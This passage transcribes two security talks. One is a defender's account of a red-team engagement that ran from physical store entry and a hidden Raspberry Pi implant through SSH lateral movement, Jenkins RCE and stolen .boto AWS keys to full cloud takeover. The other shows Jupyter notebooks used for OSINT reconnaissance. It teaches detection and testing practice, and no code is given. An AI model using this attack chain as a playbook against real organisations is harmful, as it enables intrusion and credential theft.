teaming at Expel. Meaning every time we have an alert that comes in and every time that we are looking at an investigation or an incident, we train our analysts to think in this mindset. We're not a big, big fans of run books, especially when they're stapled onto technology. We really like to train our analysts in terms of how to think. And if we can teach them to answer these five basic investigative questions, every time an alert comes up, we believe that we can solve any particular breach. So over here on the right hand side, you'll see that I actually have a redacted screenshot of that CrowdStrike activity. Now, this CrowdStrike activity, when you look at

the actual alert that showed up in our console, you would actually see a suspicious file called a.py executing out of a temp directory of an OSX laptop. Now, why is that significant and why is that something that we're alerting on? Well, one of the really sketchy things about that Python file was that it matched a signature pretty closely to a known version of the empire backdoor. Now the empire backdoor, there's empire, M-P-I-R-E, but there's also M-P-Y-R-E, which is a fork of that Windows project that allows you to actually have a C2 framework for cross-platforms using Python. So what we were actually seeing was a Python backdoor running on an OSX laptop. We know that that's going to allow remote access to an OSX

host. And we know that this started happening about five minutes ago. So using this basic framework of kind of who, what, where, why, when, we can start deducing where we are in the actual breach itself. So for me, as an investigator, the questions that I have is, I know that I have a Python backdoor on this box. I know that likely it needed some kind of privilege to run and execute. How did it get that privilege and how did it get there itself? That's really what I need to go start figuring out. And what you can see here is this kind of highlights my exact questions, is we see that this a.py framework running on

this box, but we know once we actually go look at the host, we're going to find some sort of access that happened. And what we noticed was that slightly before this backdoor started running, someone had SSHed into one of the hosts. Now that's significant because if they were able to SSH in and then run a, well, remove a back door and then execute it on the box, they likely have some kind of admin credential for that specific laptop and likely other laptops or maybe even other machines and servers in that environment, which is basically a red teamers, you know, It's their dream world to be in early on in an engagement. I have credentials that can get me anywhere. Let's see where they can go. And we think about

that a lot when we're doing blue teaming because we don't want to just know and tell the customer, hey, there's a backdoor on this box. We want to make sure that we're telling them the whole story. And knowing where we are in this breach lifecycle is kind of the next step into investigating this thoroughly. Now, to take a break from where we are in the blue team side of this story, I'm going to talk to you a little bit about what was actually going on on the red team side. Now, I'm going to preface this with we didn't know this until this whole thing was over. And we actually found this by reading the red

team report, which was shared with us. But I think it's really important to kind of know and kind of a cool thing to keep in the back of your head while we're going through the rest of this story. Now, this graphic that you'll see here shows a mall. And the attackers, the red teamers that were actually moving their way into the environment, they decided that since they had full reign and since they had, you know, capability to do whatever they wanted to get into this specific environment, they decided to take a little bit of a non-standard approach, which I thought was really cool. What they decided to do was that they actually decided to go

out to specific retail locations that this company owned and try to socially engineer and try to do kind of a survey of ways that they could possibly get in at the physical layer, right? So at four or five different retail locations across the globe, actually, they actually sent them a of different places, they went to the storefront, walked in, pretended to be a customer, and started looking around the store for ways in which they could start to get their way onto the network. And one of the first things that they did was they did a basic Wi-Fi survey of the environment and saw that there was a guest network open. Now, the guest network actually didn't really get them too far. It was subnetted off, but they were able

to walk around the store long enough to find a back entrance to the store that was attached to one of the dressing rooms that they had access to as a customer. So in the Red Team report, they actually write all this out, which is hilarious, but the Red Team actually went and tried on a pair of shorts. And they grabbed the shorts off the rack. They got an attendant to bring them to the dressing room. And as they came out of the dressing room, they actually snuck their way into the back entrance of the store, which took them to the quote unquote back room warehouse section of that retail store. And in that store was

a machine that was left unlocked. And the red team was actually able to get onto that machine while still wearing the bike shorts that they had taken to the dressing room to try on. And they were actually able to snoop around on that machine a little bit to see what was on it. And one of the things that they came across right away on the desktop of that machine was an Excel spreadsheet that had credentials in it. a lot of the different employees that access systems in the store. For example, there was POS systems logins. There were Wi-Fi passwords for the different networks that were used between the POS systems, the retail customers, as well

as some of the back-end employees. There were logins for Okta. There were logins for all kinds of different things that the customer employed to be able to give services to that specific store. And what they did was they simply just took a screenshot of that with their phone and walked out of the store, put the shorts back and left. Now, what they decided to do next, which I think is the most interesting part, is they decided to use that store as their persistence, meaning they came back to the store armed with all of those credentials, and they actually built a small computer using a Raspberry Pi and a couple of antennas in which they actually created a VPN tunnel onto the Wi-Fi network that they now had credentials to.

So they built this little Raspberry Pi computer. They taped it up with a few Wi-Fi antennas, and they actually went to a small gathering place just outside of the store where they actually taped the computer underneath the table with a large cell battery and taped it underneath there with the antennas pointing down to be able to connect to the store's Wi-Fi and then VPN back to a server that they were hosting in Linode to be able to get VPN access into that store securely, but also to persist over time through that store and continue their reconnaissance of that piece of the network. Now, I think that's absolutely ingenious. And one of the things that's even cooler about this is that that little computer that was sitting

under the table went unnoticed by anyone in the mall, including security, including anyone else for two whole weeks, which is insane to me. But it was finally discovered. It was finally taken down. It was there forever and that was how they got in. And we're going to talk about kind of how we piece that together and how we figured that out on our own here in a second. Diving away from the red team side of the story, we're going to go back and start talking about what actually was happening from a blue team perspective. Now, going back to that lead alert that we were looking at for the Python back door that was installed on

that OSX laptop, we started using CrowdStrike pretty extensively to figure out what these guys were trying to do. And CrowdStrike is really cool for this kind of stuff because it gives you a lot of that juicy, low-level detail that we need, and specifically process-level detail, to know exactly what these guys were doing with the backdoor. You can see here, I'm including a query that we use very commonly with CrowdStrike to kind of talk about our investigative process in a little more depth. I'm not going to read that off, but if you want to take a screenshot of it and use it, if you're using CrowdStrike Falcon specifically, this is our favorite way of actually timelining

a host. And once we've timelined a host, we can kind of understand exactly what happened after that backdoor was executed. And specifically, we're looking for additional commands that they're running to support the theory that this was likely their way in, and now we're looking for reconnaissance. What happens next? Now, what I'm expecting as a blue teamer and someone that's done a lot of investigation into, you know, post-compromise activity, I'm expecting that this laptop wasn't the one that they were looking for when they decided to get into the environment. I'm expecting that what they're actually trying to look for is somewhere else. And we're going to start expecting them to try to discover different hosts and move laterally. So really what we start to

see is that every time these guys infect a new machine, what they're doing is they're using those credentials that they stole off of that laptop for SSH. They're going to install their backdoor. They're going to dump the OSX keychain using this tool that I've referenced here. And you can go check that out too. It worked really well for them. But also what the other thing that they're going to do that I thought was rather unique and stood out like a sore thumb when we were doing these investigations was they were actually examining the command line history of every single box. And through the command line history of a bunch of these different hosts, they started

getting juicer juicier and juicier data as they started moving their way through the environment. And you can see here in the diagram that I have referenced, what they were doing was they were just moving laptop to laptop to laptop to find interesting hosts that they could keep stealing more and more data from. Now, eventually, one of the things that we found was that they actually landed on a developer's machine. Now, you might be asking, developers don't normally work in retail stores, right? That doesn't make a whole lot of sense. But what we were assuming was the Red Team actually found a way to laterally move and actually found a subnet where they were able to

actually get to the headquarters of this specific retail company. Now, for that to happen is pretty significant because we wouldn't expect that this store was anywhere near the headquarters of this major company. But all we could deduce right now is that these guys were able to do a couple of different things. We knew that they had SSH access, we knew that they had stolen credentials, and we knew that they had ways of moving laterally and performing remote code execution. This is where things start to get really spicy because they basically have all of the tools to move, to execute, and they have the right level of privileges to keep moving their way through pretty much any environment that they're going to come across. Now, you're probably

asking yourself at this point, Tyler, we haven't even talked about the cloud yet. And I get it. And this is kind of where we were too when we were doing this investigation. We weren't super prepared for what was about to happen next because we, at this point, hadn't seen very many, if any, signals that were leading us to believe that these guys had access to the cloud. Now, what we found out at the end was that from these retail locations, The red team actually found a way to move from the retail store to the headquarters to the warehouses and a bunch of other different places because this entire customer was on one flat network. Now, by flat network, I don't mean everything was on the same subnet, but

everything was connected via MPLS VPN. meaning that all of these subnets were routing basically back to a corporate headquarters or a bunch of different locations in which the attacker could easily identify assets and basically just SSH internally from one place to another. And what we started to see them do was we started to see and track these SSH connections to a bunch of different physical locations around the globe. So they were in one retail store here, then they were in another one, then they made it to the headquarters, then they were over here. We watched them go a lot of different places. But eventually where they landed, like I was talking about before, was they found a specific development subnet and they found servers that were

being used to actually push and sustain a lot of the mobile applications that were being used by this customer. Now, one of the tools that this customer used was Jenkins. And Jenkins is a very common build and deploy type utility where a bunch of developers are going to be pushing code, accessing it, and basically pushing builds of new software. Now, what's really interesting about Jenkins is Jenkins is kind of known to have a lot of vulnerabilities. And specifically, the Jenkins that these guys came across had one pretty big CVE that allowed RCE over the network. And what you can see here in the second bullet is that this RCE was actually used to pull down

a Java executable that the red team compiled themselves and install onto the server itself. Now, why is that significant? Well, it's only significant if it gives these guys additional access and it did because as soon as they actually created the payload to go and run this RCE and pull down their Java executable, they actually had Empire Backdoor running as a privileged user on a production build server, which is nuts, right? So they found the CVE, they exploited it using one of the hosts internally that they had found and were able to access. And then they were able to pull down their own backdoor, run it on this host, and now they have access to an actual production server inside of the headquarters of this company.

Now you can see here, I kind of spelled out how this works. Like I said, they basically are able to manipulate the headers that Jenkins is able to strip over HTTP, pull down the executable, run it, boom, I have command line on this host as if I was a privileged user sitting right in front of the machine. Now, why this matters is because now we're here. And really, we didn't know this in the moment as soon as we saw this happening. But what we started seeing right away after this Jenkins exploit was thrown was we started seeing more AWS alerts. And what started happening was we started seeing not only this attacker starting to try kind of basic reconnaissance style things in AWS, but what

they actually started to do was they started playing with things that we consider more administrative. You can see here, access key creation, SSH key pairs being generated. Those alerts I referenced at the beginning of the presentation, this is where those start flowing in. And what's really interesting is that we didn't really have a good sense of how this was happening because it was coming from an internal host. But what we started seeing, as you can see in this diagram, is that up until April 25th, we didn't really see a lot of admin activity happening with any of these users. But then all of a sudden, these guys had admin level access through the AWS API.

They had privileged access to start creating a lot of the actions that you see at the top half of this chart. So how did this happen? How did these guys get the ability to be able to do this? Well, what we started seeing was that the Jenkins server was, we knew that was vulnerable. But what we didn't know was how they actually got the creds to do that. And what they were able to do was they were able to actually start enumerating through the back door that they dropped on that Jenkins machine common locations that AWS access keys were being stored. And one of the treasures that they hit was a couple of different .boto

files where AWS keys are stored commonly. They were able to actually just read those in plain text, copy and paste out the details, and create their own Boto files on their machines that were located somewhere else to authenticate against the AWS API. So to recap that really quick, they stole credentials from inside the network. They recreated those credentials on their own machines, and then they started authenticating against the AWS API remotely from their own boxes that they had stored completely elsewhere. Now, that's pretty significant because now we've gone through the entire enterprise and we're starting to see these guys use the AWS API from new IOCs. They're using them from those Linode hosts that we

talked about earlier. They're authenticating from other AWS hosts. They're able to now manipulate this same command line utility the same way that the developers were able to manipulate it using their own machines. And that's pretty interesting because that changes our whole attack surface and starts to create that diagram that we talked about earlier. So once they had this access, what exactly did they start doing? We talked a little bit about the AWS CLI and being able to manipulate the cloud. What exactly does that mean? Well, first and foremost, what they started to do was they started to impersonate users. Now, impersonation, that are impersonation in AWS is kind of an interesting thing. This allows me similar to like a pseudo style thing to basically take the privileges of another

account that are set up beforehand and be able to use the same abilities that that user has. So I like to think of this as pseudo, but they started using this to create their own accounts. So once they started creating their own accounts, we now have more IOCs that we need to track because we're expecting the attacker to come back and use those in a similar way that they were going to use their stolen credentials. But with these new accounts, they were actually able to switch roles as well to be able to access all AWS instances that the customer owned. So we were in one AWS instance that was being used for development. One of

the roles that they were able to get a hold of actually had the ability to read, write, and execute against all of the different AWS instances that this customer owned. And this is where full cloud compromise starts to happen. Because what they were able to do next is they were able to start doing things at a global level. They were actually able to start using that AWS root utility to be able to log into the console and make changes as if they were a super admin at this particular customer. Now, a couple of different things that they tried as well, which were rather interesting, they were actually able to take control using the console access

that they had and using some of the other credentials that they were able to steal from the enterprise to actually bypass 2FA. And how they did that was that they were able to actually use an Ubuntu exploit on one of the machines using that administrative user that they actually stole from to be able to execute a common backdoor to be able to get around 2FA and create their own 2FA users. Now, One of the interesting things about that is we also have duo detections and we actually saw this being done in real time where one of the red teamers actually used that exploit to get around to FA and create their own user and then

literally register their own cell phone to be able to do the two factor authentication, which was really, really clever in my opinion. Now, a couple of other things they started to do, obviously, like we know S3 buckets are a big pain point in AWS and a lot of incidents start with them. They were able to read and access about 257 S3 buckets with that access that they stole. And they also started to launch new AWS EC2 instances. Now, in the latter, that latter part where we talk about launching EC2 instances, that's a really noisy thing and a really, you know, kind of boisterous thing to do if you're an actual attacker. But remember, we're in

the red team world. We're talking about things that theoretically can be done and what could an attacker do if they were actually able to get a hold of your AWS instance. And that's what they chose to do to prove that their level of access was actually privileged enough to be able to spin up and use resources without the customer knowing. Now, lastly, and this is probably the most interesting part of what the attacker did in AWS. We're talking about root console access. We're talking about the keys to the kingdom. And one of the things that the attackers started to do is they realized that they had gotten really far, but they hadn't really exfilled any information yet. They hadn't really got to the part where an attacker who

is literally trying to target this company would have gone and stolen customer data or stolen PII. This is the part where they did that. And I thought that this was ingenious. What they decided to do was they actually decided to take a snapshot of the virtual disk of that particular machine that they found a Postgres database on. Since they couldn't get in and the credentials weren't valid, they figured that they could take this to the administrative layer, the EC2 layer, and actually abuse some of the tools to be able to copy that hard drive, download it, take it offline, and actually throw it against one of their cracking utilities to brute force the password to

that machine. And sure enough, They actually got one of the passwords using a pretty intense brute forcing rig that they had access to. And they were actually able to crack it offline and access all of the secrets that were in that database. So this is kind of mind blowing to me because this is stuff that's going to defeat guard duty. This is going to defeat cloud trail. This is going to basically render the trail cold in terms of things that we can detect in the cloud, but was probably the most fruitful things that the act, the attacker actually got, um, you know, access to that they were able to abuse in the AWS console to

be able to benefit from it, which is really interesting. And like I've said a few times now, like at this point in time, from going from the enterprise, from that dressing room, from being able to get to that laptop that was unlocked with all the passwords on it, to being able to SSH their way through the environment, eventually making their way into the cloud, the attackers had control of everything in AWS. Any action that you can perform via the API or in the console itself, they had the ability to do. And these were the things that they chose to teach us in terms of what they had access to. You might be wondering at this

point, like, okay, cool, Tyler. Like you saw all this stuff happening. What did you actually do about it? Right? Because we're supposed to be protecting this client. within 15 minutes of the attacker breaking into the retail store, we were able to actually quarantine the machine that the attacker had initial foothold on. And this cut off the attacker's initial access, which we obviously didn't know was a red team at the time, but it subsequently stopped the entire engagement. And for the sake of this engagement, the red team actually called the customer and said, hey, we just had our access cut off. This was us. Could you please let us back in? And obviously for the sake

of learning and for the sake of letting this engagement play through We unquarantine that machine and let the red team go and to see what they would do. And that's kind of the real big takeaway from this is that when we're doing red team response and when we're acting as a blue team, when there's an active red team in the environment, It's not about red versus blue. It's not about who can detect who, and it's not about who can get by who. It's working together to protect the organization and find things and find security holes that previously were unknown. And that's where we want to play. We want to play in that purple team model

of learning and getting better. Now, some of the takeaways that we had is a big one is enterprise security woes can lead to cloud security woes. And specifically network segregation and AWS credential access was a big player here of being able to see how far the attacker could get. Now, I'm not saying that the red team wouldn't have found another way in, in terms of, you know, being able to find another way or fishing their way in or going to another retail store. But that original unlocked laptop got them pretty far. And that's a pretty simple thing to fix with GPO and a bunch of other tools that allow you to manage assets. But really

kind of where we thrived and where we learned a ton is getting really comfortable with the alerting that AWS specifically allows you, gets you out of the box. And that's through AWS GuardDuty. And you'll see here, I have a QR code. I promise this isn't malicious. This is going to take you to our blog post that we wrote after this is kind of making sense of AWS GuardDuty alerts. These are some of the things that we found to be successful with. And see, these are some of the high fidelity signals that we look at and we triage every single day. But really what I want to give a final hurrah to was actually the red

team that made this possible. I can't say their name for... confidentiality purposes. But this is really, in my opinion, what a great red team engagement looks like. They had full reign to do whatever they wanted. They had physical and virtual access, meaning we're not just testing what's vulnerable from the internet's perspective, but we're also testing the ability of the employees to spot threats and some of the actual physical pieces of what was actually implemented in this environment to prevent these guys from getting in, which was really cool. And I've talked about this a few times, the collaboration between red and blue team, like We had an open line to the red team. They had an

open line to us. We could easily identify when stuff was red team and confirm with the red team that this was something that they were doing. So we know that there wasn't a critical incident that we needed to chase elsewhere in the environment, which was really nice from a blue team perspective. And lastly, mostly native tooling. And why this is important is because mostly native tooling is what makes detection hard. We talk about prevalence and we talk about things that are commonly seen in environments, you know, PowerShell, Bash command line utilities, a lot of that stuff makes detection really hard because all applications use these and all of them do really interesting and sometimes seemingly malicious things that we have to weed out. This red team did a really

good job at staying to a lot of that tooling and abusing a lot of the things that are commonly seen in this environment to blend in and make us work and strengthen our detection, which was really cool to see as the engagement played out. That's it for this story and that's it for the things that I want you to take away from this talk. Again, great red versus blue team engagement. Use some of this when you're thinking about doing your own red team engagement or if you're a blue teamer and you're looking to learn about AWS, please go take a look at our blog post. Please reach out. You can reach me at any of

these contacts and definitely take a look at expel.io in terms of our blog to just kind of look, see some of the things that we're seeing and learn from some of the interesting things and some of the mistakes that we've made along the way. We're very open about them. Thanks again. My name is Tyler. Have a good one.

Hey everybody, welcome to our talk, a drop of Jupyter, where we're going to show you how to use Jupyter Notebooks for a more modular and dynamic approach to penetration testing. Shout out to anybody that can get the reference. There's a hint right above the Jupyter logo. If you get it, drop something in the chat. So here's a quick overview of our team. On the next few slides, we'll be going into a bit more detail into who we are and some additional information into what we do. So who am I? I am a security consultant at Protivity. I focus on NetPen primarily, but I also do OSINT and tooling research, as well as operating as a amateur tool developer. So I've made some stuff that's gained some traction

in the bug bounty community. I'll talk a little bit about more later on in the presentation, but mostly, again, really happy to be here. And shout out to the guys at B-Sites for giving us this opportunity. I'm going to introduce one of our partners in this, Cody, first. Cody is a consultant at Protivity. He likes to refer to himself as a jack-of-all-trades pen tester. He helps us with quite a bit of everything, a little bit of web app, a little bit of NetPen, and he also specializes in mobile application testing. And he also prefers to automate report writing. Who am I? I am Nate Kirk. I am a senior security consultant at Protivity. I specialize in network penetration testing and red teaming. I am also the infrastructure and

tooling lead for the Protivity attack and pen practice. I've actually worked with Omar on integrating this into our infrastructure and our day-to-day, and also we'll talk about that later down the road of how you can do it too. I am also a former sysadmin and Blue Teamer. So just a quick refresher, if you are familiar with Jupyter or if you have no idea what it is, Jupyter is essentially It's a non-profit open source IPython project. IPython is a command line terminal for Python. Historically, Jupyter has been primarily used for data science, but what we're trying to do is we're trying to pivot that and show you the applications that can be used for penetration testing specifically. Quick overview again of some of the functionality and what it is.

It is a platform where you can have parallel documentation and execution at the same time. It is a simple and collaborative file repository. So imagine combining like your OneNote, notebook of commands, scripts, et cetera, while also being able to execute them at the same time. So there's no more copying, pasting, or referring back to any of your past history. You have everything in one place for your documentation and execution. And additionally, so there's also data manipulation and reporting abilities. For example, If you want to integrate a map plot lib or any other libraries, or if you want to use a R kernel for your statistics or developing reporting metrics, that functionality is also there. It's also accessible via a browser, which we'll touch upon more

in the coming presentation. But before that, I wanted to quickly kind of give a brief overview of why Jupyter. So the idea for creating a Jupyter notebook kind of stemmed from I was starting out as a junior penetration tester. I found myself constantly flipping through notes, maybe like writing long bash scripts, and trying to get things to do them where I really didn't have the knowledge and the know-how. I felt like this wasn't an ideal learning environment. for new testers as well that were coming in. So we came up with the idea to create a Jupyter notebook that had the commands and the documentation for newer testers and as well as for current testers to automate and be able to standardize their

methodology. So Jupyter, in a nutshell, again, it's a simple and easy to use platform. It's a better method to facilitate the training and project execution of an assessment at the same time. It provides a collaborative environment as well as management oversight. And there's currently a large opportunity for involvement with penetration testing activities and changing things so that it's not just used as a data science framework, but more so as an offensive security framework in the future.

So how does Jupyter work? Jupyter essentially, it has a active kernel, so it enables continuous testing. That active kernel that we're using for our demonstration is written in, it's a Python kernel, but there's over 100 plus kernels that you can use. So you could change your kernel to Ruby, to Go, to JavaScript. There's a lot of possibilities again, and that kind of contributes to the extensibility of Jupyter itself. It has code and markdown that is inputted in a modular format. So for example, code is inputted into cells, markdown is inputted into cells, and those cells can be interchangeable throughout the Jupyter Notebook for more modular testing. operates off of a server client infrastructure that Nate will touch on later on in the presentation itself. And one of the

coolest things, I think, is the combination of code that you can use. So for example, you can combine Python and Bash together to create really modular scripts, strong and powerful complex functions. And it really opens up a wider array of possibilities for penetration testing, especially when you have a Jupyter instance running on your Kali machine.

So I'm going to try to go over a quick few examples of some of the highlights that I mentioned. So for example, with code and markdown, you can see this is a very brief and stripped down, I guess, overview or demo of what a notebook could look like. So you can see at the very top, it says, this notebook introduces some Python concepts. So that's an example of a markdown cell. Beneath that, there's some Python code, where you'll see print hello world, and you'll see some numeric functions happening, and you'll also see the output. But Jupyter operates within these cells, so you'll have a cell of markdown, you'll have a cell of code, and those are typically the two main cells for functionality in a Jupyter notebook.

Here's a quick example that, again, Nate will touch on a lot more. I just wanted to show you guys kind of what the server client infrastructure looks like. So currently, I have a Jupyter notebook running on my Kali machine, serving it up. and I access it via a web browser using HTTPS and a port that I specified. You can also set a password, which I would strongly recommend, especially if you're working in Teams or if you have sensitive data inside of your Jupyter Notebook.

To iterate kind of what I was talking about, the Python or any other code really combination method, so this is a quick example of how Python and Bash can be interactive together inside of a Jupyter Notebook. So you'll see that there is a mix of both Python and Bash scripting. As you can see, I've created a list variable in Python, and inside of that list are contained six strings. So in the next two lines of codes, I've used a loop to iterate across that list. And instead of using a Python print statement, I'm passing the variable i, set in Python to bash and using that bash command to perform an echo to output to the Jupyter Notebook. So this is a very simplified version of what you

can do, but I hope that it illustrates at least the possibilities that are available while using a Jupyter Notebook for penetration testing.

So some key issues that we've noticed and kind of the reasons behind why we wanted to create a Jupyter notebook for penetration testing or performing penetration testing related activities. Does that current frameworks such as Pentester framework or any other methodology that you might be using, maybe you have everything just dropped into a simple bash script, but other frameworks lack the extensibility, the modular nature, the documentation, the markdown, and the collaborative nature that Jupyter Notebook has to provide additional functionality within Teams. So what Jupyter is better at than other frameworks, it has a specific set of documentation, magic commands, notebook extensions, and it's very easy to use. there's a GUI. It's not something that's necessarily complex or difficult to start off with for newer penetration

testers or penetration testers with more skin in the game. And like I mentioned before, it's collaborative in nature. Due to the nature of the file explorer, anybody can download a file, upload a file, edit a file, as well as the Jupyter Notebook itself. And some of the issues stemming from that are the current environment of how some of our penetration testing activities are conducted, we see that there is a constantly changing landscape of new tools and methodologies. So this makes it difficult to constantly update frameworks. It makes it difficult to share these framework updates or tools or anything new that's popping up in the community. And as a result, we kind of see that there's a lack of a truly collaborative and modular framework for pentesting itself.

So combined with a lack of standardized methodology within Teams, there's also a resultant factor of documentation sprawl within Teams, especially for newer pen testers, which makes it really hard to kind of hop in the game. A sprawl of commands, scripts, notes that are usually kind of just littered everywhere. So having a centralized repository really helps with that. And we will start to reduce another issue, which is kind of the barriers to entry for newer testers.

So our solution is relatively simple. I hope that you all have guessed it by now. But we want to utilize Jupyter Notebooks to develop modular and standardize automation frameworks for the execution and documentation of core penetration testing activities. And what we'll do to kind of illustrate that is that we'll go over into a demo of an OSINT notebook that we've created. And it's a bit of a stripped down version of what we use. the lab itself, but nonetheless it's a good explanation of the functionality that you can leverage with Jupyter to perform key activities.

So here's a quick overview of what we're going to be covering and the functionality that the Jupyter Notebook will conduct. So on one side there will be subdomain enumeration, then email enumeration, and vendor service enumeration. There will also be some additional functionalities happening in the Jupyter Notebook that we will work through live. So after some of the data is gathered, there will be some formatting, verification if a domain's alive or not, and then ultimately at the end, parsing a deliverable that management can look at due to the collaborative nature of Jupyter or for anybody to pull down. And so we'll go ahead and start the demo.

Okay, and so just to give a quick overview as to kind of how Jupyter is structured and maybe make some of the stuff that I was talking about sound more practical. So Jupyter, like I mentioned, it has a file repository. Within this file repository, I've created a folder called demo. Within this file repository, you can see and view all the running Jupyter notebooks. So you can see how some of my personal ones that I use for testing or for bug bounty or things of that nature. And there's also, like I mentioned, extensions that you can use to change how your code is displayed, reporting features. There's a lot more than what's being displayed right now. There's a lot of functionality that you can add with these extensions,

but for now we'll try to keep it as basic as possible. So moving on into the Jupyter Notebook itself. I'm gonna go ahead and kind of just walk through some of the additional functionality that I showed. So, Jupyter has a file tab. You can open, you can check the version history if you're using it for collaborative reasons of how the Jupyter Notebooks change similar to a Google Drive or something of that nature. You can download the notebook and there's additional functionality within the cell running functions. So, you have, again, like I mentioned, you have code cells, like how you can see in the start time that I'm putting. And you'll see that I've imported the date time and I've printed out the date time

as a start time. And again, some of the data right here is not accurate, but I'll clear it and then hopefully they'll give you all a better idea of how the Jupyter Notebook runs. So I'm going to go ahead and clear all the output. And now you'll see no outputs coming from these tools. As you can see, I have some markdown and then I have some code cells. So in one of the cells, there is a setup script or a few cells of setup that are run during the Jupyter OSINT notebook. So for example, in this cell right here, I'm setting all my variables to be passed So in Python, I'm saying that the domain is portivity.com. I'm saying that the client is

portivity, and I'm creating a folder name called demo to store all the outputs from the notebook. And here again is kind of an example of a combination of Bash and Python scripting, kind of like I mentioned before, where I'm performing a host lookup on the Python variable, except I'm doing it in Bash, and then I'm storing the output from that Bash or that IP address and storing it back into a Python variable. So I hope that kind of illustrates the dynamic nature of code within Jupyter. So I'm going to go ahead and run this cell block. And this is relatively easy. And I've already created the folder, so you'll see an output that says the folder cannot be created, which is totally fine. And

then I'm going to print out all the variables that I just set. So I can show you all kind of how it works. Now you can see that the client name has been set to productivity and so on and so forth. Another core portion of the setup script is the tool initialization script, which we don't have to go into too much detail. Again, it's relatively straightforward. Essentially, all it's doing is it's trying to create a modular framework for me to reference tools in the notebook. So for example, instead of specifying the whole path of a common tool used in OSINT like subfinder or sublister, it will just perform a locate and then store that path into a dictionary so I can reference it throughout the notebook. And so I'm

going to go ahead and run this script to initialize all the tools that I'm going to use in the notebook. And you should start to see some output. So you'll see that all these paths have now been set into a dictionary.

Going back to kind of the overview that I showed, one of the first things I wanted to show is our subdomain enumeration process. Again, this is a bit stripped down because of time constraints and the nature of the demo. So I kind of wanted to show you guys how a standard tool like SubFinder would look like being run inside of a Jupyter Notebook. So all I have to do, is the command is already written in there. If I'm a new tester and I've never run Subfinder before, I can read the markdown description of what it does. And all I have to do is click Run inside of the cell block, and it'll start to enumerate

the subdomains for me inside of the notebook itself. So it mitigates the need to really understand, I guess, terminal commands in general. Of course, that's something that's important, but for training and automation purposes, this can be something that's really useful during assessments. So SubFinder will run. Once SubFinder is completed, then the next tool will run. The next tool is called AssetFinder. It's written by TomNamNam. And similar to SubFinder, it forms the same functionality, but typically when doing OSINT, you want to kind of spread your landscape a bit to see and use multiple tools to get as many subdomains as you can. So I'm going to go ahead and run the AssetFinder. Now that's going to run and similarly to

Subfinder you'll see that the output is coming out in real time towards your notebook. Now one thing I do want to show is that I'm performing a T in Bash to store all these domains into the notebook itself as a separate file. So I can go to my folder or anybody from my team can go to my folder and they can go into B-Sides demo for all these purposes. And some of these are already run so but they'll reiterate and overwrite as we go through the demo, but this domains.csv you can see it was just modified seconds ago. It's the one that we just ran. So I can go into it and I can see all the subdomains from asset finder and sub finder outputted together.

I can edit this, I can send it off to somebody, anybody can pull it down. So this really shows the collaborative nature of Jupyter itself.

But of course, a common problem is that you have all these subdomains, right? But I would need to dedupe them. So within Jupyter itself, I have a small script to format and dedupe those subdomains. So we'll just take a look at this again. I have about 870 subdomains, not unique, but I want to sort them and get all the uniques from them. So in Jupyter, I can run the bash script that I wrote, or anybody can run it, regardless if they have batch testing experience. and it'll give me an output that I wrote in Python to let me know it's complete with the print complete statement. And I'll go ahead and go back to domains, refresh. And I'll see now that I'm left with 344

unique subdomains, right? So again, I hope this illustrates the ease of use with this. You're not typing commands, you're not copying, pasting from another notebook or from your notes. You have everything in a centralized repository for testing. And everybody can use the same standardized methodology for testing that you are.

And I'll go ahead and give a quick overview of some of the additional functionality inside of the notebook. And then I'll go ahead and do a run all so you guys can kind of see how long it takes for the automation to run, for all these commands to run and things like that. But in a nutshell, kind of like I showed in the overview before, I'll be performing some additional commands like verifying what domains are live with this bulk reverse DNS script. I'll be scraping emails. the Infoga tool. I'll be looking at Shodan, which is going to take all the IP addresses from the subdomains automatically and then put it into Shodan for running and searching on various queries. I'll

also be looking at cloud enumeration to see what cloud assets are available. We'll also be pulling from a breach list to seeing what information is on the breach list for the domain that we're using, which is Protivity.com. Of course, that information will be redacted and deliverable, so there will be no passwords or anything of that nature. And then a personal script that I've developed called GitDorker, which essentially what it does is it automates the dorking of GitHub dorks on a specific domain. So for example, if he's in productivity.com, it would run a query on password, connection string, et cetera, et cetera. And of course, all that information is already redacted and more so it's the only results that you'll see are from my own GitHub

repository that I use to kind of show fake results. And then towards the end, there is a parsing script that I wrote. that will parse all the outputs from this notebook into a clean and nice Excel deliverable. So you can use that as a base point. You know, I'm not saying that this is like a perfect method for OSINT, but you can develop a very strong base to work off of, regardless of your experience by using Jupyter notebooks and by collaborating with people and creating stronger Jupyter notebooks due to the modular nature. It's a very easy base to build off of and improve on in the future. I'll go ahead and and run the Jupyter notebook in full and the way I do that is I will start at

the top and I'll click sell and run all so now the the Jupyter notebook will start to go through each of these cells so you'll see the start time printed and this is just something I wanted to put in just to show you guys how how quickly the Jupyter notebook can run so it started at military time 15.45 and our time 3.45 and 37 seconds. You can see that it's run through the setup script. So it's set the domain variables and it's run again through the tool initialization script. And I'll go ahead and minimize this. And it's currently running through Subfinder and it's gonna run through Asset Finder and go subsequently throughout

these different scripts that were and also brought in from third-party resources or tools that were developed online. So again, there's a lot of functionality within Jupyter to put in your own customized scripts with Python and Bash scripting to create a really truly modular framework for pen testing itself. And so as we go through, we can see that now the email gathering portion has started. And then after that, Shodan will start taking all the IPs that were automatically grab from the DNS probe and then so on and so forth through until all the tools are completed. So while we let this run, we can go back to this, but I want to kind of show you guys a quick heads up into what the deliverable itself will

look like. So if you can see here on my screen, I have an Excel deliverable that would be parsed at the end of this notebook. So what I have is I have all my alive subdomains, unique and sorted, A through Z, and the corresponding IP, which makes it a lot easier for a tester to just view and be like, okay, I know what's live, I know what the test, I can create a new column for comments, check what's there, check what's not there, and standardizing that methodology so we're not running into inconsistencies while we're testing within Teams. And again, here you can see the cloud assets that printed that outputted from the cloud enumeration tool that was used. You can see

a tab for IPs only if you want to do some further testing on IPs themselves. You can see the showed in output of all the IPs that were queried against, and you can see the various ports, of course, the results of those ports, and so on and so forth. And then you can also see the tool that I developed, GitDorker, where it will output the dorks themselves, the specific URL to hit to access the dork so you don't have to put anything yourself, and the number of results for you to filter and search through.

And then here's the breach list from the command that we ran to pull in breach list data from dhashed. As you can see, everything's redacted for obvious reasons, so there will be no stealing of passwords here, but I did want to show you guys the functionality and the ability to pull things, large data sets relatively easily with Jupyter. And then finally, as you guys saw before I switched over, there was a script running called Infoga to pull email data. And so this is already cleanly parsed and scraped from Infoga and output it into one clear deliverable. So again, there's no additional actions that I'm taking at the end of this notebook. All I'm doing is I'm clicking sell, run

